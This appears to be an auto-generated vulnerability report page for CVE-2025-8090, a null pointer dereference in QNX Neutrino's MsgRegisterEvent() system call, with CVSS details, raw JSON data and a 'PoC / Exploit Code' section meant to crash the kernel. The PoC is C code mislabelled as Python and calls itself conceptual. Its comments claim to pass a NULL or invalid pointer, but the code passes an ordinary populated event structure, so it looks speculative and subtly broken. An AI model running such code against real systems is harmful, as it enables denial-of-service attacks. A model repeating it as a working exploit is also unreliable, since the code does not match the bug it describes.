Security Vulnerability Report
中文
CVE-2025-8090 CVSS 6.2 MEDIUM

CVE-2025-8090

Published: 2026-01-13 17:15:59
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Null pointer dereference in the MsgRegisterEvent() system call could allow an attacker with local access and code execution abilities to crash the QNX Neutrino kernel.

CVSS Details

CVSS Score
6.2
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

QNX Neutrino RTOS (版本未明确指定,请参考BlackBerry官方公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * CVE-2025-8090 PoC - Null Pointer Dereference in MsgRegisterEvent() * Target: QNX Neutrino Kernel * Author: Security Researcher * Note: This is a conceptual PoC for educational purposes only */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/neutrino.h> #include <sys/syspage.h> /* * Trigger the null pointer dereference in MsgRegisterEvent() * by passing a crafted event structure with invalid pointers. */ int trigger_vulnerability() { int chid; int coid; struct _pulse pulse; // Create a channel for receiving pulses chid = ChannelCreate(_NTO_CHF_FIXED_PRIORITY); if (chid == -1) { perror("ChannelCreate failed"); return -1; } // Connect to the channel coid = ConnectAttach(0, 0, chid, _NTO_SIDE_CHANNEL, 0); if (coid == -1) { perror("ConnectAttach failed"); ChannelDestroy(chid); return -1; } /* * Trigger the vulnerability by calling MsgRegisterEvent() * with a NULL or invalid event pointer. * The exact parameters depend on the specific QNX version. */ struct sigevent event; memset(&event, 0, sizeof(struct sigevent)); // Set up an invalid event structure to trigger null pointer dereference event.sigev_notify = SIGEV_PULSE; event.sigev_coid = coid; event.sigev_priority = getprio(0); event.sigev_code = 0x12345678; // This call may trigger the null pointer dereference int ret = MsgRegisterEvent(coid, 0, &event); if (ret == -1) { printf("MsgRegisterEvent failed (expected on vulnerable systems)\n"); } else { printf("MsgRegisterEvent returned: %d\n", ret); } ConnectDetach(coid); ChannelDestroy(chid); return ret; } int main(int argc, char *argv[]) { printf("CVE-2025-8090 PoC - QNX Neutrino MsgRegisterEvent()\n"); printf("Attempting to trigger null pointer dereference...\n"); trigger_vulnerability(); printf("If the system is vulnerable, this may cause a kernel panic.\n"); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-8090", "sourceIdentifier": "[email protected]", "published": "2026-01-13T17:15:59.320", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Null pointer dereference in the MsgRegisterEvent() system call could allow an attacker with local access and code execution abilities to crash the QNX Neutrino kernel."}, {"lang": "es", "value": "Desreferencia de puntero nulo en la llamada al sistema MsgRegisterEvent() podría permitir a un atacante con acceso local y capacidades de ejecución de código bloquear el kernel QNX Neutrino."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "references": [{"url": "https://support.blackberry.com/pkb/s/article/141027", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.